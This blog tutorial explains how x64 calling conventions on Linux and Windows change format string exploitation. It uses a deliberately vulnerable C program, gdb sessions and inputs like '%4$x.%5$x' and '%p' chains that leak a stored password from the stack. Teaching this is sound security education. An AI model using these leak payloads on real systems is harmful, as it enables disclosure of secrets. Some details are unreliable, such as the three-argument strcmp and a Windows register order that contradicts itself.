Impact of x64 calling convention in format string exploitation

In this post I will try to give you a brief on how format string exploitation can differ in 64 bit architecture due to different calling convention in 64 bit.

12 min read
Impact of x64 calling convention in format string exploitation

Format string based vulnerabilities are known since ages but still can be found very easily in softwares and packages till today. The exploitation of format string vulnerability is always easy and can cause at minimum, denial of service to remote code execution. In 64 bit system the format strings exploitation is still present but the basics get changed a little due to 64 bit calling convention. In this post, I will take you through few small changes you will notice if you are trying to exploit format string in 64 bit architecture.

Basics of Format string attack - x32

I will not get much into details of format strings as I expect you have previously come across format string vulnerability at least few times. If not, then just for an exercise, let's look at a simple format string vulnerability example.

Assume the following sample code is running in a remote machine with the value of variable password to be anything else:

#include<stdio.h>
int main(){
 
    char input[100];
    char password[10] = "hello";
 
    printf ("\nEnter your password: ");
    scanf("%100s", &input);
    printf("\n Your string is :");
    printf(input);
    if (strcmp(password,input,5) == 0){
        printf("\nYour password is correct\n");
    }
    else
        {
        printf("\n Password doesn't match\n");
    }
}

Let's compile this locally to play with the program.

$gcc sample1.c -g -o sample1.out

Running the compiled program

The code above takes a user input and compare that with a string ("hello"). If the user input matches, then it prints "Your password is correct".

As mentioned above, if the code is running in remote server with unknown string variable password, then it's not easy to get the success message without guessing.  As an attacker, you can try to cause overflow by entering more than 100 chars as input, but we are restricting the no of character in scanf by using %100s.

You can guess that the code must be vulnerable to format string vulnerability(as this post is about that only), which occurs here due to directly passing the user input to printf(input) statement. Let's see how we can verify and exploit that.

Check, what will happen if we put the input with format string char in it.

We got "test" printed as it is, but %x get replaced with something else that looks like the memory addresses. We have to check the program in debugger to dig deeper.

The gdb shows the following disassembly of the program.

(gdb) disas main
Dump of assembler code for function main:
   0x000011c9 <+0>:     lea    0x4(%esp),%ecx
   0x000011cd <+4>:     and    $0xfffffff0,%esp
   0x000011d0 <+7>:     pushl  -0x4(%ecx)
   0x000011d3 <+10>:    push   %ebp
   0x000011d4 <+11>:    mov    %esp,%ebp
   0x000011d6 <+13>:    push   %ebx
   0x000011d7 <+14>:    push   %ecx
   0x000011d8 <+15>:    sub    $0x70,%esp
   0x000011db <+18>:    call   0x10d0 <__x86.get_pc_thunk.bx>
   0x000011e0 <+23>:    add    $0x2e20,%ebx
   0x000011e6 <+29>:    movl   $0x6c6c6568,-0x76(%ebp)
   0x000011ed <+36>:    movl   $0x6f,-0x72(%ebp)
   0x000011f4 <+43>:    movw   $0x0,-0x6e(%ebp)
   0x000011fa <+49>:    sub    $0xc,%esp
   0x000011fd <+52>:    lea    -0x1ff8(%ebx),%eax
   0x00001203 <+58>:    push   %eax
   0x00001204 <+59>:    call   0x1040 <printf@plt>
   0x00001209 <+64>:    add    $0x10,%esp
   0x0000120c <+67>:    sub    $0x8,%esp
   0x0000120f <+70>:    lea    -0x6c(%ebp),%eax
   0x00001212 <+73>:    push   %eax
   0x00001213 <+74>:    lea    -0x1fe1(%ebx),%eax
   0x00001219 <+80>:    push   %eax
   0x0000121a <+81>:    call   0x1070 <__isoc99_scanf@plt>
   0x0000121f <+86>:    add    $0x10,%esp
   0x00001222 <+89>:    sub    $0xc,%esp
   0x00001225 <+92>:    lea    -0x1fdb(%ebx),%eax
--Type <RET> for more, q to quit, c to continue without paging--
   0x0000122b <+98>:    push   %eax
   0x0000122c <+99>:    call   0x1040 <printf@plt>
   0x00001231 <+104>:   add    $0x10,%esp
   0x00001234 <+107>:   sub    $0xc,%esp
   0x00001237 <+110>:   lea    -0x6c(%ebp),%eax
   0x0000123a <+113>:   push   %eax
   0x0000123b <+114>:   call   0x1040 <printf@plt>
   0x00001240 <+119>:   add    $0x10,%esp
   0x00001243 <+122>:   sub    $0x4,%esp
   0x00001246 <+125>:   push   $0x5
   0x00001248 <+127>:   lea    -0x6c(%ebp),%eax
   0x0000124b <+130>:   push   %eax
   0x0000124c <+131>:   lea    -0x76(%ebp),%eax
   0x0000124f <+134>:   push   %eax
   0x00001250 <+135>:   call   0x1030 <strcmp@plt>
   0x00001255 <+140>:   add    $0x10,%esp
   0x00001258 <+143>:   test   %eax,%eax
   0x0000125a <+145>:   jne    0x1270 <main+167>
   0x0000125c <+147>:   sub    $0xc,%esp
   0x0000125f <+150>:   lea    -0x1fc8(%ebx),%eax
   0x00001265 <+156>:   push   %eax
   0x00001266 <+157>:   call   0x1050 <puts@plt>
   0x0000126b <+162>:   add    $0x10,%esp
   0x0000126e <+165>:   jmp    0x1282 <main+185>
   0x00001270 <+167>:   sub    $0xc,%esp
   0x00001273 <+170>:   lea    -0x1fae(%ebx),%eax
   0x00001279 <+176>:   push   %eax
   0x0000127a <+177>:   call   0x1050 <puts@plt>
--Type <RET> for more, q to quit, c to continue without paging--

The third printf (at main+114) is responsible to print the user input. So lets put a breakpoint before it and execute the program.

(gdb) b *main+114
Breakpoint 1 at 0x123b: file sample1.c, line 10.
(gdb) r 
Starting program: /root/format_string/sample1.out 

Enter your password: %x.%x.%x


Breakpoint 1, 0x0040123b in main () at sample1.c:10
10          printf(input);
(gdb)

Check the last 10 stack value and then continue the program.

(gdb) x/10x $esp
0xbffffb50:     0xbffffb6c      0xbffffb6c      0xb7fff950      0x004011e0
0xbffffb60:     0x6568004d      0x006f6c6c      0x00000000      0x252e7825
0xbffffb70:     0x78252e78      0x00000000
(gdb) c
Continuing.
 Your string is :bffffb6c.b7fff950.4011e0
 Password doesn't match
[Inferior 1 (process 919) exited normally]
(gdb) 

We can see that the returned string contain the last 3 stack entries except the latest esp. This behavior has occurred because the printf function parse the input string and found three format strings %x which it thought is passed as arguments. Since the parameters are passed in another function through pushing it on stack, printf pops last four entries (the first one is the string itself) and print them to stdout.

From the above case, we have learned to retrieve the stack data. Using the same we can retrieve the saved password in password variable. Since password is a local variable, the memory for it is allocated on  stack. At main+29  and main+30 instructions, the value "hello\00" is moved into stack. Let's put a BP there and check that address.

(gdb) b *main+43
Breakpoint 2 at 0x4011f4: file sample1.c, line 5.
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/format_string/sample1.out 

Breakpoint 2, 0x004011f4 in main () at sample1.c:5
5           char password[10] = "hello";
(gdb) x/x $ebp-0x76
0xbffffb62:     0x6c6c6568
(gdb)

So our string is at address 0xbffffb62. Now, continue till the BP at +114.

(gdb) c
Continuing.

Enter your password: %x.%x.%x


Breakpoint 1, 0x0040123b in main () at sample1.c:10
10          printf(input);
(gdb) x/20x $esp
0xbffffb50:     0xbffffb6c      0xbffffb6c      0xb7fff950      0x004011e0
0xbffffb60:     0x6568004d      0x006f6c6c      0x00000000      0x252e7825
0xbffffb70:     0x78252e78      0x00000000      0xb7fff000      0x00000000
0xbffffb80:     0x00000000      0xbffffc84      0xb7fb6000      0x00000000
0xbffffb90:     0x00000000      0xb7fb6000      0xb7e0dcb9      0xb7fb9588

First %x will give the memory at 0xbffffb54. So, 4th and 5th %x should return the variable password  string. We can use the format %n$x to get the nth string directly.

(gdb) r
Starting program: /root/format_string/sample1.out 

Enter your password: %4$x.%5$x

Breakpoint 1, 0x0040123b in main () at sample1.c:10
10          printf(input);
(gdb) c
Continuing.
 Your string is :6568004d.6f6c6c
 Password doesn't match
[Inferior 1 (process 1074) exited normally]
(gdb) 

0x6f6c6c6568 converts to "hello" in ascii.

Note: In case if local variable password was a string pointer rather than char array, we have to use %4$s to treat that memory address as string pointer.

So, we have found a way to retrieve the saved local variable data using format string vulnerability. We will stop the intro here as our goal is to just get a basic idea on format string exploitation, but format string exploitation is way more than this. It includes things like changing the stack data using %n , GOT overwrite etc.

Format String in x64 linux

As an initial thought, you may think that the format string exploitation should be almost similar for 64 bit, except in size of each format string entry i.e we will retrieve 8 bytes at once rather than 4 bytes. But format string in 64 bit is more than that.

Let's compile the same code in 64 bit machine and try to pass format string in user input like we do previously. This time we will pass %p instead of %x, since %x will only print 4 byte value but we need 8 byte for 64 bit architecture.

We got the expected output here. 2nd and 3rd value are (nil) because %p is showing 0x0 as (nil). Let's now confirm, where these values are coming from and try to retrieve the password string from stack.

In gdb debugger we got the following disassembly.

(gdb) disas main
Dump of assembler code for function main:
   0x0000000000001179 <+0>:     push   %rbp
   0x000000000000117a <+1>:     mov    %rsp,%rbp
   0x000000000000117d <+4>:     add    $0xffffffffffffff80,%rsp
   0x0000000000001181 <+8>:     mov    %fs:0x28,%rax
   0x000000000000118a <+17>:    mov    %rax,-0x8(%rbp)
   0x000000000000118e <+21>:    xor    %eax,%eax
   0x0000000000001190 <+23>:    movabs $0x6f6c6c6568,%rax
   0x000000000000119a <+33>:    mov    %rax,-0x7a(%rbp)
   0x000000000000119e <+37>:    movw   $0x0,-0x72(%rbp)
   0x00000000000011a4 <+43>:    lea    0xe59(%rip),%rdi        # 0x2004
   0x00000000000011ab <+50>:    mov    $0x0,%eax
   0x00000000000011b0 <+55>:    callq  0x1050 <printf@plt>
   0x00000000000011b5 <+60>:    lea    -0x70(%rbp),%rax
   0x00000000000011b9 <+64>:    mov    %rax,%rsi
   0x00000000000011bc <+67>:    lea    0xe58(%rip),%rdi        # 0x201b
   0x00000000000011c3 <+74>:    mov    $0x0,%eax
   0x00000000000011c8 <+79>:    callq  0x1070 <__isoc99_scanf@plt>
   0x00000000000011cd <+84>:    lea    0xe4d(%rip),%rdi        # 0x2021
   0x00000000000011d4 <+91>:    mov    $0x0,%eax
   0x00000000000011d9 <+96>:    callq  0x1050 <printf@plt>
   0x00000000000011de <+101>:   lea    -0x70(%rbp),%rax
   0x00000000000011e2 <+105>:   mov    %rax,%rdi
   0x00000000000011e5 <+108>:   mov    $0x0,%eax
   0x00000000000011ea <+113>:   callq  0x1050 <printf@plt>
   0x00000000000011ef <+118>:   lea    -0x70(%rbp),%rcx
   0x00000000000011f3 <+122>:   lea    -0x7a(%rbp),%rax
   0x00000000000011f7 <+126>:   mov    $0x5,%edx
--Type <RET> for more, q to quit, c to continue without paging--
   0x00000000000011fc <+131>:   mov    %rcx,%rsi
   0x00000000000011ff <+134>:   mov    %rax,%rdi
   0x0000000000001202 <+137>:   callq  0x1060 <strcmp@plt>
   0x0000000000001207 <+142>:   test   %eax,%eax
   0x0000000000001209 <+144>:   jne    0x1219 <main+160>
   0x000000000000120b <+146>:   lea    0xe22(%rip),%rdi        # 0x2034
   0x0000000000001212 <+153>:   callq  0x1030 <puts@plt>
   0x0000000000001217 <+158>:   jmp    0x1225 <main+172>
   0x0000000000001219 <+160>:   lea    0xe2e(%rip),%rdi        # 0x204e
   0x0000000000001220 <+167>:   callq  0x1030 <puts@plt>
   0x0000000000001225 <+172>:   mov    $0x0,%eax
   0x000000000000122a <+177>:   mov    -0x8(%rbp),%rdx
   0x000000000000122e <+181>:   sub    %fs:0x28,%rdx
   0x0000000000001237 <+190>:   je     0x123e <main+197>
   0x0000000000001239 <+192>:   callq  0x1040 <__stack_chk_fail@plt>
   0x000000000000123e <+197>:   leaveq 
   0x000000000000123f <+198>:   retq   
End of assembler dump.

Like earlier, put a breakpoint on 3rd printf (main+113) and run the program. Next, check the last 20 rsp's and continue program execution.

(gdb) b *main+113
Breakpoint 1 at 0x11ea: file sample1.c, line 10.
(gdb) r
Starting program: /home/hackintosh/projects/format_string/sample1.out 

Enter your password: %p.%p.%p


Breakpoint 1, 0x00005555555551ea in main () at sample1.c:10
10          printf(input);
(gdb) x/20x $rsp
0x7fffffffdc70: 0x00000000      0x65680000      0x006f6c6c      0x00000000
0x7fffffffdc80: 0x252e7025      0x70252e70      0x00000000      0x00000000
0x7fffffffdc90: 0x00f0b5ff      0x00000000      0x000000c2      0x00000000
0x7fffffffdca0: 0xffffdcc7      0x00007fff      0xf7e73efc      0x00007fff
0x7fffffffdcb0: 0xf7fd34a0      0x00007fff      0x5555528d      0x00005555
(gdb) c
Continuing.
 Your string is :0x3a.(nil).(nil)
 Password doesn't match
[Inferior 1 (process 6580) exited normally

It may look strange since the value returns in string is not similar to the ones we checked on the stack.

Let's run the program again, but this time also check the registers value.

(gdb) r
Starting program: /home/hackintosh/projects/format_string/sample1.out 

Enter your password: %p.%p.%p.%p.%p


Breakpoint 1, 0x00005555555551ea in main () at sample1.c:10
10          printf(input);
(gdb) x/20x $rsp    
0x7fffffffdc70: 0x00000000      0x65680000      0x006f6c6c      0x00000000
0x7fffffffdc80: 0x252e7025      0x70252e70      0x2e70252e      0x00007025
0x7fffffffdc90: 0x00f0b5ff      0x00000000      0x000000c2      0x00000000
0x7fffffffdca0: 0xffffdcc7      0x00007fff      0xf7e73efc      0x00007fff
0x7fffffffdcb0: 0xf7fd34a0      0x00007fff      0x5555528d      0x00005555
(gdb) info registers
rax            0x0                 0
rbx            0x0                 0
rcx            0x0                 0
rdx            0x0                 0
rsi            0x3a                58
rdi            0x7fffffffdc80      140737488346240
rbp            0x7fffffffdcf0      0x7fffffffdcf0
rsp            0x7fffffffdc70      0x7fffffffdc70
r8             0x0                 0
r9             0xffffffffffffff88  -120
r10            0x555555556021      93824992239649
r11            0x246               582
r12            0x555555555080      93824992235648
r13            0x0                 0
r14            0x0                 0
r15            0x0                 0
rip            0x5555555551ea      0x5555555551ea <main+113>
eflags         0x202               [ IF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
(gdb) c
Continuing.
 Your string is :0x3a.(nil).(nil).(nil).0xffffffffffffff88
 Password doesn't match
[Inferior 1 (process 6973) exited normally]

Again the value return are definitely not part of stack, but you can see 0x3a  and 0xffffffffffffff88 on the registers before the printf call. So, whats going on here?

Calling convention Rule 1:  In 64 bit architecture, the parameters to any function is passed using registers rather than by pushing it into stack. But this only happens for certain initial parameters i.e for better understanding, the sequence for parameter passing from left to right for both linux and windows is:

Linux: RDI, RSI, RDX, RCX, R8,  R9, remaining from the stack

Windows: RCX, RDX, RSI, RDI, remaining from the stack

Coming back to our program, when we pass 5 %p , what we retrieve is the values from registers, as printf function thought the parameters should be passed on registers. Since, RDI represent input string, we only see parameters from rsi to r9.

Now, when we will pass more than 5 format chars, we will start to see the values from the stack.

(gdb) r
Starting program: /home/hackintosh/projects/format_string/sample1.out 

Enter your password: %p.%p.%p.%p.%p.%p.%p.%p


Breakpoint 1, 0x00005555555551ea in main () at sample1.c:10
10          printf(input);
(gdb) info registers
rax            0x0                 0
rbx            0x0                 0
rcx            0x0                 0
rdx            0x0                 0
rsi            0x3a                58
rdi            0x7fffffffdc80      140737488346240
rbp            0x7fffffffdcf0      0x7fffffffdcf0
rsp            0x7fffffffdc70      0x7fffffffdc70
r8             0x0                 0
r9             0xffffffffffffff88  -120
r10            0x555555556021      93824992239649
r11            0x246               582
r12            0x555555555080      93824992235648
r13            0x0                 0
r14            0x0                 0
r15            0x0                 0
rip            0x5555555551ea      0x5555555551ea <main+113>
eflags         0x202               [ IF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
(gdb) x/20x $rsp
0x7fffffffdc70: 0x00000000      0x65680000      0x006f6c6c      0x00000000
0x7fffffffdc80: 0x252e7025      0x70252e70      0x2e70252e      0x252e7025
0x7fffffffdc90: 0x70252e70      0x0070252e      0x000000c2      0x00000000
0x7fffffffdca0: 0xffffdcc7      0x00007fff      0xf7e73efc      0x00007fff
0x7fffffffdcb0: 0xf7fd34a0      0x00007fff      0x5555528d      0x00005555
(gdb) c
Continuing.
 Your string is :0x3a.(nil).(nil).(nil).0xffffffffffffff88.0x6568000000000000.0x6f6c6c.0x70252e70252e7025
 Password doesn't match
[Inferior 1 (process 2786) exited normally]

As you can see above, after first 5 values we start to get the 8 bytes values from the stack. Luckily, our password string is also retrieved with other stack data.

Format String in x64 Windows

At last, lets check the format string in Windows system. Compile the same program in visual studio and execute it.

Format string exploitation in windows

We are getting some addresses as expected. But Let's verify that in debugger.

Open the program in x64dbg and put breakpoint at 3rd printf. Execute the program with 6 %p.

Your code will break at 3rd printf call. Notice the register and stack at that instance.

Now, continue the execution to check the string returned by the program.

You will notice that the first three address are as expected from RDX, R8, R9, as the parameters passing sequence in windows is RCX, RDX, R8, R9 and stack. But the later 3 address are from stack after latest 4 entries( 32 bytes) in top of the stack.

Calling convention Rule 2: In 64 bit windows, while calling a function, even tough the first 4 parameters are passed through registers, still space for them are allocated in stack for optimization purpose. This space of 32 bytes is called home space or shadow space.

Hence, in the above case we are not getting the data of first 32 bytes from rsp in our string since that space is reserved home space. After keeping that in mind, you can create your string with format characters  in such a way that you reach to the saved password.

So, we have seen the two minor difference calling convention of 64 bit architecture cause, that can affect your format string exploitation. I will end the post here, but I will encourage you to do more research on format string exploitation since there is lot more ways you can use format string vulnerability.